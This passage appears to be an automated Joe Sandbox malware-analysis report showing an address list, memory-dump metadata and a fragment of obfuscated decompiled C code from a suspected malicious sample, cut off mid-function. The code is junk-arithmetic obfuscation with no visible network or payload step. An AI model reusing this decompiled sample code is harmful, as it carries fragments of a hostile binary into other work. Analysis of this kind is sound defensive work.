                                              0x00ec674b
                                              0x00ec6793
                                              0x00ec6796
                                              0x00ec674d
                                              0x00ec675a
                                              0x00ec6764
                                              0x00ec6767
                                              0x00ec676a
                                              0x00ec676e
                                              0x00ec6775
                                              0x00ec6775
                                              0x00ec677a
                                              0x00ec677b
                                              0x00ec677c
                                              0x00ec6780
                                              0x00ec6780
                                              0x00ec679f
                                              0x00ec67a5
                                              0x00ec67b1
                                              0x00ec67bf
                                              0x00ec67c5
                                              0x00ec67cb
                                              0x00ec67cd
                                              0x00ec67cd
                                              0x00ec681c
                                              0x00ec6822
                                              0x00ec682e
                                              0x00ec6847
                                              0x00ec684d
                                              0x00ec6854
                                              0x00ec685b
                                              0x00ec6862
                                              0x00ec6869
                                              0x00ec6870
                                              0x00ec6877
                                              0x00ec687e
                                              0x00ec6885
                                              0x00ec688c
                                              0x00ec6893
                                              0x00ec689a
                                              0x00ec68a1
                                              0x00ec68b0
                                              0x00ec68b0
                                              0x00ec68b6
                                              0x00ec68bc
                                              0x00ec68d1
                                              0x00ec68da
                                              0x00ec68dd
                                              0x00ec68de
                                              0x00ec68e0
                                              0x00ec68f5
                                              0x00ec68f5
                                              0x00ec68f5
                                              0x00ec68e2
                                              0x00ec68e2
                                              0x00ec68ee
                                              0x00ec68ee
                                              0x00ec68e4
                                              0x00ec68ea
                                              0x00ec68ec
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec68ec
                                              0x00ec68e2
                                              0x00ec68f9
                                              0x00ec68fb
                                              0x00ec690a
                                              0x00ec6910
                                              0x00ec6928
                                              0x00ec6931
                                              0x00ec693c
                                              0x00ec694b
                                              0x00ec6956
                                              0x00ec6956
                                              0x00ec695b
                                              0x00ec695b
                                              0x00ec68fd
                                              0x00ec68fd
                                              0x00ec68fd
                                              0x00ec68be
                                              0x00ec68be
                                              0x00ec68c8
                                              0x00ec68c8
                                              0x00ec6962
                                              0x00ec696c
                                              0x00ec6976
                                              0x00ec6981
                                              0x00ec6989
                                              0x00ec698f
                                              0x00ec699c
                                              0x00ec699e
                                              0x00ec69a0
                                              0x00ec69a2
                                              0x00ec69a8
                                              0x00ec69b2
                                              0x00ec69b4
                                              0x00ec69b4
                                              0x00ec69d7
                                              0x00ec69dd
                                              0x00ec69e3
                                              0x00ec69f5
                                              0x00ec6a02
                                              0x00ec6a20
                                              0x00ec6a32
                                              0x00ec6a35
                                              0x00ec6a3d
                                              0x00ec6a3d
                                              0x00ec6a66
                                              0x00ec6a68
                                              0x00ec6a6f
                                              0x00ec6a76
                                              0x00ec6a80
                                              0x00ec6a86
                                              0x00ec6a8f
                                              0x00ec6a95
                                              0x00ec6aa3
                                              0x00ec6aac
                                              0x00ec6ab2
                                              0x00ec6aba
                                              0x00ec6aba
                                              0x00ec6abc
                                              0x00ec6b8a
                                              0x00ec6b91
                                              0x00ec6ba3
                                              0x00ec6ba8
                                              0x00ec6bae
                                              0x00ec6bb5
                                              0x00ec6bb5
                                              0x00ec6bbb
                                              0x00ec6ac2
                                              0x00ec6ac2
                                              0x00ec6ac5
                                              0x00ec6acb
                                              0x00ec6acb
                                              0x00ec6ace
                                              0x00ec6ad4
                                              0x00ec6ad6
                                              0x00ec6ae0
                                              0x00ec6ae6
                                              0x00ec6ae9
                                              0x00ec6af2
                                              0x00ec6af2
                                              0x00ec6aeb
                                              0x00ec6aeb
                                              0x00ec6aeb
                                              0x00ec6af7
                                              0x00ec6afd
                                              0x00ec6aff
                                              0x00ec6b08
                                              0x00ec6b08
                                              0x00ec6b01
                                              0x00ec6b01
                                              0x00ec6b01
                                              0x00ec6b1f
                                              0x00ec6b2f
                                              0x00ec6b32
                                              0x00ec6b34
                                              0x00ec6b3c
                                              0x00ec6b3e
                                              0x00ec6b41
                                              0x00ec6ad6
                                              0x00ec6ac7
                                              0x00ec6ac7
                                              0x00ec6ac9
                                              0x00ec6b57
                                              0x00ec6b65
                                              0x00ec6b6b
                                              0x00ec6b6e
                                              0x00ec6b76
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6ac9
                                              0x00ec6ac5
                                              0x00ec6bc2
                                              0x00ec6bc8
                                              0x00ec6bcf
                                              0x00ec6bd5
                                              0x00ec6bdc
                                              0x00ec6be3
                                              0x00ec6bef
                                              0x00ec6bf3
                                              0x00ec6bf6
                                              0x00ec6bfc
                                              0x00ec6c05
                                              0x00ec6c0c
                                              0x00ec6c12
                                              0x00ec6c1a
                                              0x00ec6c26
                                              0x00ec6c2c
                                              0x00ec6c31
                                              0x00ec6c35
                                              0x00ec6c35
                                              0x00ec6c38
                                              0x00ec6c48
                                              0x00ec6c4b
                                              0x00ec6c54
                                              0x00ec6c59
                                              0x00ec6c59
                                              0x00ec6c60
                                              0x00ec6c60
                                              0x00ec6c63
                                              0x00ec6c69
                                              0x00ec6c72
                                              0x00ec6c74
                                              0x00ec6ca8
                                              0x00ec6cae
                                              0x00ec6cb1
                                              0x00ec6cb2
                                              0x00ec6cb4
                                              0x00ec6cba
                                              0x00ec6cd5
                                              0x00ec6ce9
                                              0x00ec6cf7
                                              0x00ec6cfd
                                              0x00ec6d05
                                              0x00ec6d0b
                                              0x00ec6cb6
                                              0x00ec6cb6
                                              0x00ec6cb8
                                              0x00ec6d19
                                              0x00ec6d19
                                              0x00ec6d1d
                                              0x00ec6d1d
                                              0x00ec6d1f
                                              0x00ec6d24
                                              0x00ec6d27
                                              0x00ec6d2e
                                              0x00ec6d2f
                                              0x00ec6d2f
                                              0x00ec6d30
                                              0x00ec6d34
                                              0x00ec6d35
                                              0x00ec6d3b
                                              0x00ec6d40
                                              0x00ec6d4d
                                              0x00ec6d50
                                              0x00ec6d5e
                                              0x00ec6d64
                                              0x00ec6d64
                                              0x00ec6d66
                                              0x00ec6d6d
                                              0x00ec6d6e
                                              0x00ec6d6e
                                              0x00ec6d71
                                              0x00ec6d73
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6cb8
                                              0x00ec6c76
                                              0x00ec6c7d
                                              0x00ec6c83
                                              0x00ec6c86
                                              0x00ec6c8d
                                              0x00ec6c98
                                              0x00ec6c9d
                                              0x00ec6c9d
                                              0x00ec6c74
                                              0x00ec6e5d
                                              0x00ec6e65
                                              0x00ec6e66
                                              0x00ec6e66
                                              0x00ec6e6f
                                              0x00ec6e7d
                                              0x00ec6e87
                                              0x00ec6e8d
                                              0x00ec6e94
                                              0x00ec6e9d
                                              0x00ec6ea2
                                              0x00ec6ea9
                                              0x00ec6ea9
                                              0x00ec6eab
                                              0x00ec6f65
                                              0x00ec6f6b
                                              0x00ec6f6d
                                              0x00ec6f76
                                              0x00ec6f76
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f7e
                                              0x00ec6f7e
                                              0x00ec6f82
                                              0x00ec6eb1
                                              0x00ec6eb1
                                              0x00ec6eb4
                                              0x00ec6eba
                                              0x00ec6eba
                                              0x00ec6ebd
                                              0x00ec6ec3
                                              0x00ec6ec5
                                              0x00ec6ed4
                                              0x00ec6ef3
                                              0x00ec6efa
                                              0x00ec6f03
                                              0x00ec6f09
                                              0x00ec6f0c
                                              0x00ec6f22
                                              0x00ec6f23
                                              0x00ec6f26
                                              0x00ec6f26
                                              0x00ec6ec5
                                              0x00ec6eb6
                                              0x00ec6eb6
                                              0x00ec6eb8
                                              0x00ec6f36
                                              0x00ec6f37
                                              0x00ec6f4a
                                              0x00ec6f56
                                              0x00ec6f59
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6eb8
                                              0x00ec6eb4
                                              0x00ec6fa1
                                              0x00ec6fa1
                                              0x00ec6fa9
                                              0x00ec6fb0
                                              0x00ec6fb5
                                              0x00ec6fb5
                                              0x00ec6fb8
                                              0x00ec6fb9
                                              0x00ec6fb9
                                              0x00ec6fd4
                                              0x00ec6fd4
                                              0x00ec6fd6
                                              0x00ec6fdc
                                              0x00ec6fe3
                                              0x00ec6fe3
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6ff6
                                              0x00ec6ff9
                                              0x00ec7002
                                              0x00ec7009
                                              0x00ec7013
                                              0x00ec701a
                                              0x00ec701c
                                              0x00ec701e
                                              0x00ec7025
                                              0x00ec7027
                                              0x00ec7027
                                              0x00ec702e
                                              0x00ec7035
                                              0x00ec703c
                                              0x00ec704a
                                              0x00ec704b
                                              0x00ec7050
                                              0x00ec705d
                                              0x00ec7081
                                              0x00ec7084
                                              0x00ec7085
                                              0x00ec708b
                                              0x00ec708b
                                              0x00ec7091
                                              0x00ec7091
                                              0x00ec7097
                                              0x00ec7097
                                              0x00ec7867
                                              0x00ec7872
                                              0x00ec7872
                                              0x00000000
                                              0x00ec5e62
                                              0x00ec5e67
                                              0x00ec5f2f
                                              0x00ec5f34
                                              0x00ec5f34
                                              0x00ec5f3c
                                              0x00ec5f3f
                                              0x00ec5f40
                                              0x00ec5f45
                                              0x00ec5f4b
                                              0x00ec5f4d
                                              0x00ec5f58
                                              0x00ec5f58
                                              0x00ec5f5f
                                              0x00ec5f65
                                              0x00ec5f6b
                                              0x00ec5f6e
                                              0x00ec5f70
                                              0x00ec5f72
                                              0x00ec5f74
                                              0x00ec5f7a
                                              0x00ec5f85
                                              0x00ec5f8e
                                              0x00ec5f9b
                                              0x00ec5fa1
                                              0x00ec5faa
                                              0x00ec5faf
                                              0x00ec5fb8
                                              0x00ec5fbe
                                              0x00ec5fc1
                                              0x00ec5fcb
                                              0x00ec5fcf
                                              0x00ec5f76
                                              0x00ec5f76
                                              0x00ec5f78
                                              0x00000000
                                              0x00000000
                                              0x00ec5f78
                                              0x00ec5f74
                                              0x00ec5f4f
                                              0x00ec5f4f
                                              0x00ec5f52
                                              0x00000000
                                              0x00000000
                                              0x00ec5f52
                                              0x00ec5fd2
                                              0x00ec5fd9
                                              0x00ec5fdf
                                              0x00ec5fdf
                                              0x00ec5fdf
                                              0x00000000
                                              0x00ec5e78
                                              0x00ec5e82
                                              0x00ec5e91
                                              0x00ec5ec1
                                              0x00ec5ec7
                                              0x00ec5fe8
                                              0x00ec5fe8
                                              0x00ec5fed
                                              0x00ec5ff2
                                              0x00ec5ffa
                                              0x00ec5ecd
                                              0x00ec5edc
                                              0x00ec5ee6
                                              0x00ec5eec
                                              0x00ec5efe
                                              0x00ec5f14
                                              0x00ec5f19
                                              0x00ec5f1c
                                              0x00ec5f21
                                              0x00ec5f26
                                              0x00ec5f2e
                                              0x00ec5f2e
                                              0x00ec5e93
                                              0x00ec5e9c
                                              0x00ec5ea5
                                              0x00ec5ea8
                                              0x00ec5eae
                                              0x00ec5eb3
                                              0x00ec5ec0
                                              0x00ec5ec0
                                              0x00ec5e91
                                              0x00ec5e67
                                              0x00ec5e5c
                                              0x00ec5cb7
                                              0x00ec5a8c

                                              APIs
                                              • TlsGetValue.KERNEL32(FFFFF835,?,?,A666078F,FFF500A5), ref: 00EC402B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID: Value
                                              • String ID: %GR$GetLastError$L$SSh$v
                                              • API String ID: 3702945584-213904386
                                              • Opcode ID: 1c94b9c1d6a5b988736a5d30f9688a00203670c05353ca17a828ad14f04a7aed
                                              • Instruction ID: 71c4af2cd430d5bc1038b8f9730618ed7a518353f266622eaabb3b8d81d39b10
                                              • Opcode Fuzzy Hash: 1c94b9c1d6a5b988736a5d30f9688a00203670c05353ca17a828ad14f04a7aed
                                              • Instruction Fuzzy Hash: 08B2B2749043988FCB25CFA8D590BEDBBB2FF59344F14906EE485A738DDA3A5A41CB10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC4269 Relevance: 32.5, APIs: 13, Strings: 5, Instructions: 1022COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 83%
                                              			E00EC4269(signed int __edi, void* __esi) {
				void* _t1010;
				signed int _t1013;
				signed int _t1014;
				signed int _t1017;
				signed char _t1028;
				signed short _t1029;
				signed int _t1032;
				signed int _t1040;
				long _t1042;
				signed int _t1043;
				signed int _t1050;
				signed int _t1058;
				signed int _t1061;
				signed int _t1064;
				signed int _t1067;
				signed int _t1078;
				signed int _t1082;
				void* _t1087;
				void* _t1089;
				signed int _t1090;
				signed short _t1096;
				signed char _t1097;
				signed int _t1098;
				signed short _t1102;
				signed int _t1104;
				signed int _t1108;
				signed int _t1111;
				signed int _t1115;
				signed int _t1117;
				signed short _t1120;
				signed int _t1122;
				signed char _t1127;
				WCHAR* _t1130;
				signed int _t1161;
				signed int _t1168;
				signed int _t1169;
				signed char _t1177;
				signed int _t1179;
				signed int _t1180;
				signed int _t1181;
				void* _t1182;
				signed int _t1190;
				char _t1198;
				char _t1199;
				void* _t1224;
				signed int _t1232;
				signed int _t1233;
				signed int _t1234;
				signed short _t1235;
				signed int _t1245;
				signed int _t1250;
				signed short _t1251;
				signed int _t1256;
				signed short _t1281;
				signed short _t1282;
				signed int _t1292;
				signed int _t1293;
				void* _t1301;
				signed int _t1313;
				signed int _t1314;
				signed int _t1316;
				signed int _t1319;
				signed short _t1322;
				signed int _t1326;
				signed int _t1332;
				signed int _t1333;
				signed int _t1334;
				signed int _t1336;
				signed int _t1339;
				signed short _t1340;
				signed int _t1342;
				signed int _t1345;
				void* _t1351;
				signed char _t1357;
				signed short _t1365;
				signed short _t1381;
				signed int _t1391;
				signed int _t1395;
				signed int _t1397;
				signed int _t1399;
				signed short _t1400;
				signed int _t1406;
				signed int _t1430;
				signed int _t1458;
				signed int _t1459;
				signed int _t1467;
				signed int _t1483;
				signed int _t1495;
				signed char _t1502;
				signed int _t1505;
				signed short _t1513;
				signed short _t1514;
				void* _t1516;
				signed int _t1518;
				signed int _t1521;
				signed short _t1525;
				signed short _t1535;
				signed int _t1538;
				signed int _t1544;
				signed short _t1546;
				signed char _t1562;
				signed char _t1567;
				char _t1571;
				signed int _t1574;
				signed short _t1579;
				signed int _t1582;
				signed short _t1588;
				signed int _t1595;
				signed char _t1602;
				signed int _t1607;
				signed short _t1616;
				signed int _t1622;
				signed short _t1624;
				signed int _t1625;
				signed int _t1634;
				signed char _t1636;
				long _t1637;
				signed int _t1638;
				signed short _t1655;
				signed int _t1662;
				signed int _t1671;
				signed int _t1672;
				signed int _t1690;
				signed int _t1696;
				signed int _t1700;
				signed int _t1703;
				signed int _t1724;
				signed int _t1725;
				signed int _t1728;
				signed int _t1771;
				signed char _t1778;
				signed int _t1787;
				signed int _t1790;
				signed int _t1791;
				signed int _t1792;
				char _t1803;
				unsigned int _t1814;
				signed short _t1825;
				signed short _t1827;
				signed int _t1829;
				signed int _t1859;
				signed int _t1863;
				signed int _t1865;
				signed int _t1878;
				signed int _t1882;
				signed int _t1891;
				signed int _t1893;
				signed int _t1895;
				signed int _t1910;
				signed int _t1912;
				signed int _t1914;
				signed int _t1919;
				signed short _t1920;
				signed int _t1942;
				signed int _t1949;
				signed int _t1954;
				signed int _t1957;
				char _t1966;
				signed int _t1970;
				signed int _t1980;
				signed int _t1983;
				signed int _t1984;
				signed char _t1989;
				signed int _t1991;
				signed int _t1993;
				signed short _t1997;
				signed int _t2001;
				signed int _t2006;
				signed int _t2008;
				signed int _t2010;
				signed int _t2030;
				signed int _t2033;
				signed int _t2059;
				signed int _t2065;
				signed int _t2079;
				signed int _t2080;
				signed int _t2081;
				signed int _t2087;
				signed int _t2088;
				signed int _t2098;
				signed int _t2099;
				signed char _t2101;
				signed int _t2114;
				signed int _t2128;
				signed int _t2132;
				long _t2133;
				signed int _t2144;
				signed int _t2150;
				long _t2151;
				signed char _t2154;
				signed int _t2155;
				signed int _t2161;
				signed int _t2162;
				signed int _t2167;
				short* _t2169;
				struct HINSTANCE__* _t2173;
				signed int _t2182;
				char _t2183;
				short _t2184;
				signed int _t2186;
				signed char _t2188;
				signed char _t2190;
				signed int _t2193;
				signed int _t2200;
				signed int _t2211;
				signed int _t2213;
				signed short _t2215;
				WCHAR* _t2216;
				signed int _t2233;
				signed int _t2236;
				signed int _t2238;
				signed int _t2242;
				signed int _t2244;
				signed short _t2245;
				signed int _t2248;
				struct HINSTANCE__* _t2255;
				signed int _t2259;
				signed int _t2263;
				signed int _t2269;
				signed int _t2270;
				signed int _t2282;
				signed int _t2285;
				signed int _t2287;
				signed int _t2289;
				signed int _t2291;
				signed int _t2296;
				signed int _t2297;
				signed int _t2298;
				signed short _t2301;
				long _t2309;
				signed int _t2313;
				signed int _t2315;
				signed int _t2318;
				signed int _t2324;
				signed int _t2330;
				signed int _t2335;
				signed int _t2343;
				signed int _t2344;
				signed int _t2354;
				signed int _t2365;
				signed int _t2368;
				signed int _t2369;
				signed int _t2372;
				signed int _t2399;
				signed int _t2408;
				signed int _t2423;
				signed int _t2427;
				long _t2429;
				signed int _t2433;
				unsigned int _t2442;
				signed int _t2449;
				long _t2456;
				signed char _t2463;
				signed int _t2465;
				signed short _t2475;
				signed int _t2476;
				signed int _t2488;
				signed char _t2491;
				struct HWND__* _t2492;
				signed int _t2496;
				signed int _t2506;
				signed short _t2512;
				signed int _t2514;
				signed int _t2516;
				signed int _t2519;
				signed int _t2529;
				signed int _t2533;
				signed int _t2535;
				void* _t2543;
				signed int _t2547;
				void* _t2548;
				void* _t2549;
				signed int _t2550;
				struct HINSTANCE__* _t2551;
				signed int _t2552;
				signed int _t2557;
				void* _t2558;
				signed int _t2560;
				signed int _t2565;
				signed int _t2566;
				signed int _t2567;
				signed int _t2568;
				signed int _t2573;
				signed int _t2574;
				void* _t2587;
				void* _t2608;
				void* _t2609;
				void* _t2613;
				void* _t2618;
				void* _t2622;
				void* _t2649;
				void* _t2655;
				void* _t2665;

				_t2543 = __esi;
				_t2516 = __edi;
				goto L1;
				L4:
				 *(_t2587 - 8) =  *(_t2587 - 0x78) *  *(_t2587 - 0xa) - _t1655 + 0xe;
				 *(_t2587 - 2) = ( *(_t2587 - 2) & 0x000000ff) *  *(_t2587 - 0x4c);
				 *0x1000cc8 =  *0x1215420;
				 *0x1000ccc = _t2516;
				 *(_t2587 - 0xa) =  *(_t2587 - 0xa) + 1;
				_t2543 = _t2543 - 1;
				if(_t2543 > _t2516) {
					L1:
					 *(_t2587 - 0xbc) = _t2516;
					if( *(_t2587 - 0x90) != 0) {
						_t1655 = 0;
						__eflags = 0;
					} else {
						_t1655 = 1;
					}
					goto L4;
				} else {
					 *(_t2587 - 7) = E00EC1700();
					if((0 |  *(_t2587 - 7) == 0x00000000) != (0 |  *(_t2587 - 7) == 0x00000008)) {
						 *0x1000d18 =  *0x1000d18 +  *(_t2587 - 0x70);
						asm("adc [0x1000d1c], edi");
					}
					_t1662 =  *0x1000cc0; // 0xffff970a
					_t2114 =  *0x1000cc4; // 0xffffffff
					 *(_t2587 - 0xa4) = 0x89cf - ( *(_t2587 - 0xa4) ^  *(_t2587 - 0x20)) -  *(_t2587 - 0x20) -  *(_t2587 - 0x14);
					 *(_t2587 - 0x14) =  *0x1215420;
					 *0x1000c8c = _t2114 >> 3;
					 *0x1000c88 = (_t2114 << 0x00000020 | _t1662) >> 3;
					asm("sbb edx, edx");
					 *0x1000cec =  ~(( *0x1000c98 & 0x0000ffff) *  *0x1000d20) + 1 - ( !(( *(_t2587 - 2) & 0x000000ff) -  *(_t2587 - 0xa0)) ^  *(_t2587 - 0xf) & 0x000000ff) - M01000CB0 -  *0x1000cf8;
					 *(_t2587 - 0xa4) =  *(_t2587 - 0x14) + 0xe2c6;
					_t1671 =  *0x1215420;
					 *0x1000c9c = _t1671;
					 *0x1000cd0 = _t1671;
					_t1672 =  *0x1000cf0; // -2
					 *0x1000cdc = 2;
					_t1010 = 2 - _t2516;
					 *(_t2587 - 0x20) =  *(_t2587 - 0x14) + 0x97e5;
					 *(_t2587 - 4) = _t1672;
					 *(_t2587 - 1) = 0x76;
					if(2 == 0) {
						 *(_t2587 - 2) =  *(_t2587 - 2) + 2 *  *0x1000cc8;
						_t1013 = M01000CB0; // 0x0
						_t2128 =  *(_t2587 - 0x58);
						_t1014 = E00ECEE50(_t2128,  *(_t2587 - 0x54), _t1013, 0);
						__eflags = _t1014 | _t2128;
						 *0x1000cf4 = _t2516;
						 *0x1000cf0 = 1;
						if((_t1014 | _t2128) != 0) {
							 *0x1000cf0 = _t2516;
						}
						__eflags =  *(_t2587 - 0x30);
						_t2132 = ((0 |  *(_t2587 - 0x30) == 0x00000000) + ( *0x1000c9b & 0x000000ff)) * ( *0x1000c9b & 0x000000ff);
						__eflags = _t2132;
						_t1017 =  *0x1000cc8; // 0x1
						 *(_t2587 - 0x90) = _t2132;
						_t2133 =  *0x1000ccc; // 0x0
						 *(_t2587 - 2) = E00FFD310(_t1017, 7, _t2133);
					} else {
						if(_t1010 == 1) {
							_t2514 =  *0x1000cd4; // 0x0
							 *(_t2587 - 0x24) = _t2514;
							 *0x1000ce8 =  *(_t2587 - 0xf) & 0x00004288;
							 *0x1000c9e = 0x4a;
						}
					}
				}
				 *(_t2587 - 0x20) =  *(_t2587 - 0x14) + 0x2b;
				 *(_t2587 - 0xac) = ( *(_t2587 - 0xb4) |  *(_t2587 - 0xac)) - ( *(_t2587 - 0x20) * 0x0000ab8c |  *(_t2587 - 0x20) |  *(_t2587 - 0xa4)) + 0x1cf2d2;
				if((0 |  *(_t2587 - 9) != ( *0x1000ce8 & 0x0000ffff)) > (0 |  *(_t2587 - 9) != 0x00000037)) {
					 *0x1000cd8 =  *0x1000cd2 + 0xb5;
					 *0x1000d18 =  *(_t2587 - 0x70) * 0x6dd6;
					_t2144 =  *(_t2587 - 0x4c);
					 *0x1000d1c = _t2516;
					 *(_t2587 - 0x4c) =  *(_t2587 - 0x4c) - ( *(_t2587 - 0x24) & 0x0000ffff) - _t2144;
					_t96 = _t2587 - 0x70;
					 *_t96 =  *(_t2587 - 0x70) + ( *0x10ad044 & 0x0000ffff);
					__eflags =  *_t96;
				} else {
					_t1622 =  *(_t2587 - 0x40);
					_t2098 =  *(_t2587 - 0x3c);
					_t2608 = _t1622 -  *0x1000cc8; // 0x1
					if(_t2608 != 0) {
						L17:
						_t2144 = 1;
					} else {
						_t2609 = _t2098 -  *0x1000ccc; // 0x0
						if(_t2609 == 0) {
							_t2144 = 0;
							__eflags = 0;
						} else {
							goto L17;
						}
					}
					_t2099 =  *(_t2587 - 0x3c);
					if( *(_t2587 - 0x40) != 0x49 || _t2099 != _t2516) {
						_t1624 = 1;
					} else {
						_t1624 = 0;
						__eflags = 0;
					}
					if(_t2144 == _t1624) {
						_t2101 =  *(_t2587 - 5) +  *0x1000d18;
						_t1625 =  *(_t2587 - 5);
						_t2144 = _t1625 * _t2101 >> 0x20;
						 *(_t2587 - 5) = _t1625 * _t2101;
						asm("sbb ecx, [0x1000d1c]");
						asm("sbb ecx, [ebp-0x34]");
						 *(_t2587 - 0x38) =  *(_t2587 - 0x38) -  *0x1000d18 -  *(_t2587 - 0x38);
					}
				}
				_t1028 =  *0x1000c9e;
				_t1690 =  *(_t2587 - 0x48);
				asm("cdq");
				_t2613 = _t2144 -  *(_t2587 - 0x44);
				if(_t2613 < 0 || _t2613 <= 0 && _t1028 < _t1690) {
					_t1029 = 0;
					__eflags = 0;
				} else {
					_t1029 = 1;
				}
				if(_t1029 < (0 |  *0x1000c9e - 0x00000019 >= 0x00000000)) {
					asm("cdq");
					 *0x1000d10 =  *0x1000d10 -  *0x10b67f4;
					 *0x1000cc0 = _t2516;
					asm("sbb [0x1000d14], edx");
					_t2512 =  *(_t2587 - 0x84) ^ 0x0000c91a;
					asm("cdq");
					 *0x1000d04 = _t2512;
					 *0x1000ca8 =  *0x1000ca8 +  *(_t2587 - 0x58);
					 *0x1000cc4 = _t2516;
					 *0x1000d00 = _t2512 & 0x0000ffff;
					asm("adc [0x1000cac], edx");
				}
				 *(_t2587 - 0x14) =  *0x1215420;
				_t1032 = GetSystemDefaultLangID() & 0x0000ffff;
				 *0x1000cdc = _t1032;
				if(_t1032 != _t2516) {
					 *(_t2587 - 6) = 0;
					_t2618 =  *0x1000cec - _t2516; // 0x9b7c
					 *0x1000ca8 = ( *(_t2587 - 0xd) & 0x000000ff &  *(_t2587 - 0x7c) ^  *(_t2587 - 5) & 0x000000ff ^  *(_t2587 - 1) & 0x000000ff) * (( *(_t2587 - 0xa) & 0x000000ff ^ (0 | _t2618 == 0x00000000)) - ( *(_t2587 - 0xc) & 0x000000ff) * ( *0x1000cf8 & 0x0000ffff));
					_t2506 =  *0x1000cec; // 0x9b7c
					_t1616 =  *0x1000c9c; // 0xd4
					 *0x1000ce8 =  *0x1000ce8 - (_t2506 ^  *0x1000ce8);
					 *0x1000cac = _t2516;
					 *0x1000c9c = (_t1616 - ( *(_t2587 - 1) & 0x000000ff)) * _t1616;
					if(( *(_t2587 - 6) & 0x000000ff) == 0) {
						asm("cdq");
						 *0x1000c9f = 0x38;
						 *(_t2587 - 0x40) =  *(_t2587 - 0x40) -  *0x1000cd0;
						asm("sbb [ebp-0x3c], edx");
						 *0x1000cb4 = 0x91a4;
					}
				}
				 *(_t2587 - 0xb4) =  *(_t2587 - 0x14) + 0x3ec;
				 *(_t2587 - 0xac) =  *(_t2587 - 0x14) + 0x314;
				 *0x1000cb4 =  *(_t2587 - 0x40);
				_t1696 =  *0x1000d08; // 0xd72e
				 *0x1000c9b =  *(_t2587 - 0xb);
				 *(_t2587 - 0xd) = ( *(_t2587 - 0xd) & 0x000000ff) * _t1696;
				 *(_t2587 - 8) =  *(_t2587 - 0x1c) * 0x50;
				 *(_t2587 - 0x20) =  *(_t2587 - 0x14) + 0xcc;
				_t2150 =  *0x1000cb8; // 0x4
				_t1040 =  *0x1000cbc; // 0x0
				_t2151 = _t2150 + 0x16;
				asm("adc eax, edi");
				 *0x1000ce8 =  ~( *(_t2587 - 0x80));
				 *0x1000d04 = _t1040;
				_t1700 =  *0x1000d18; // 0x0
				 *0x1000d00 = _t2151;
				asm("cdq");
				_t1042 =  *0x1000d1c; // 0x0
				asm("sbb ebx, edx");
				_t1043 = E00ECEE50(_t1700 - ( *(_t2587 - 0xa) & 0x000000ff), _t1042, _t1700, _t1042);
				 *0x1000d1c = _t2151;
				 *0x1000d18 = _t1043;
				 *0x1000c83 = 1;
				 *0x1000cec = 0x6923;
				 *((char*)(_t2587 - 0xd4)) = 0xa1;
				 *((char*)(_t2587 - 0xd3)) = 0xa2;
				 *((char*)(_t2587 - 0xd2)) = 0xa3;
				 *(_t2587 - 0x84) = 0x30;
				 *(_t2587 - 5) =  *0x1000c9f >> 2;
				do {
					_t1703 =  *0x1000cd0;
					 *0x1000cb4 = ( *(_t2587 - 3) & 0x000000ff) - 0x2e8c;
					_t2622 =  *0x1000cdc - _t1703; // 0x84521e70
					if(_t2622 > 0) {
						_t2154 =  *(_t2587 - 3) & 0x000000ff;
						_t2547 =  *0x1000cbc; // 0x0
						_t1634 =  *0x1000cb8; // 0x4
						asm("cdq");
						 *0x1000cb8 = E00ECEE50(E00ECEE50(_t2154 & 0x000000ff, _t2154, _t1634, _t2547), _t2154, _t1634, _t2547);
						_t1050 =  *0x1000d10; // 0x0
						__eflags =  *0x1000cd0; // 0x0
						 *0x1000ca4 = _t1050 -  *0x1000ca4;
						 *0x1000cbc = _t2154;
						_t2155 =  *0x1000cc8; // 0x1
						_t1058 = (( !(( *0x1000c83 & 0x000000ff) *  *0x1000d18) -  *0x1000ce8 & 0x0000ffff) - ( *(_t2587 - 1) & 0x000000ff)) * (_t2155 - (0 | __eflags == 0x00000000) *  *0x1000cd4 & 0x0000ffff);
						__eflags = _t1058;
						 *(_t2587 - 0x2c) = _t1058;
					} else {
						_t2492 =  *0x1000cb8; // 0x4
						 *(_t2587 - 0x28) = IsZoomed(_t2492);
						if( *(_t2587 - 0x28) == 0) {
							_t2081 =  *0x1000cb8; // 0x4
							if((_t2081 |  *0x1000cbc) == 0) {
								( *(_t2587 - 6) & 0x000000ff) -  *(_t2587 - 9) =  *(_t2587 - 0x7c) -  !(( *(_t2587 - 6) & 0x000000ff) -  *(_t2587 - 9) > 0);
								if( *(_t2587 - 0x7c) <  !(( *(_t2587 - 6) & 0x000000ff) -  *(_t2587 - 9) > 0)) {
									_t1607 =  *0x1000ca8; // 0x7b8b5249
									_t2087 =  *0x1000d18; // 0x0
									 *0x1000c84 =  *0x1000c84 + 1;
									M01000CB0 = _t1607 * 0xc1;
									 *(_t2587 - 5) =  *(_t2587 - 5) + _t2087;
								}
							} else {
								_t2496 = M01000CB0; // 0x0
								 *(_t2587 - 6) = _t2496 & 0x00000009;
								_t2088 =  *0x1000d20; // 0x530e
								 *(_t2587 - 0x30) = ( *(_t2587 - 0x30) & 0x0000ffff) - _t2088;
								 *(_t2587 - 0x78) = 0x4c;
								 *(_t2587 - 0x74) = 0;
							}
						}
					}
					_t1636 = ( *(_t2587 + _t2516 - 0xd4) & 0x000000ff) + 0x90;
					_t1061 = E00EC1700();
					M01000CB0 = _t1061;
					if(_t1061 == 0) {
						if( *(_t2587 - 4) == 0) {
